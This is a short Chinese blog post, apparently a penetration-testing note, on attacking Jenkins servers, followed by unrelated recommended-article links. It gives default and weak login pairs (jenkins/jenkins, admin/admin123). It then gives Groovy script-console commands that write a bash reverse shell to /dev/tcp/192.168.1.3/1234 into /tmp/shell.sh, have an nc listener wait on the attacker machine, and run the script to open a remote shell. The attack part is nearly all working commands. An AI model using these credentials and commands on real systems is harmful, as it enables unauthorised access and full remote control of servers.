web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

web中间件漏洞-Jenkins漏洞-弱口令、反弹shell

Jenkins弱口令

默认用户一般为jenkins/jenkins

使用admin/admin123登陆成功

Jenkins反弹shell


格式为 println"命令".execute().text

在/tmp目录中生成shell.sh文件,并向其中写入反弹shell的语句

new File("/tmp/shell.sh").write('bash -i >& /dev/tcp/192.168.1.3/1234 0>&1'

println "ls-al/tmp/shell.sh".execute().text

攻击机nc监听1234端口,使用sh命令执行服务器上的脚本进行反弹shell,println"sh/tmp/shell.sh".execute().text

相关推荐
li35743 小时前
将已有 Vue 项目通过 Electron 打包为桌面客户端的完整步骤
前端·vue.js·electron
Icoolkj4 小时前
VuePress 与 VitePress 深度对比:特性、差异与选型指南
前端·javascript·vue.js
excel4 小时前
CNN 分层详解:卷积、池化到全连接的作用与原理
前端
excel4 小时前
CNN 多层设计详解:从边缘到高级特征的逐层学习
前端
西陵5 小时前
Nx带来极致的前端开发体验——任务编排
前端·javascript·架构
大前端helloworld6 小时前
从初中级如何迈入中高级-其实技术只是“入门卷”
前端·面试
苦逼IT运维7 小时前
Jenkins 监控方案:Prometheus + Grafana 实践
jenkins·grafana·prometheus
东风西巷7 小时前
Balabolka:免费高效的文字转语音软件
前端·人工智能·学习·语音识别·软件需求
aristo_boyunv7 小时前
拦截器和过滤器(理论+实操)
java·数据仓库·hadoop·servlet